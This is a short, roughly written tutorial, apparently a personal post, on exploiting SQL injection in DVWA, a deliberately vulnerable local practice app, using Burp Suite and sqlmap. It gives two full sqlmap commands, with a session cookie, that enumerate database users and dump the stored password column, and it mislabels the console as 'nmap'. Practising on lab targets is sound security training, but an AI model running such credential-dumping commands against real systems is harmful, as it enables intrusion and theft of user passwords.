How to use mysql injection and sqlmap DVWA

1. Before using dvwa we first

• start apache 

• Next startx mysql 

2. Next open broser mantra next typewriting : localhost/dvwa

3. Next open burp suite

4. Next typewriting the console nmap : ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie="security=low; PHPSESSID=e4va855hrd4gteb5ru18li8v60" --string="Surname" --users --password

5.Next typewriting the console nmap :  ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie="security=low; PHPSESSID=e4va855hrd4gteb5ru18li8v60" --string="Surname" -D dvwa -T users -C password -dump

23.19.00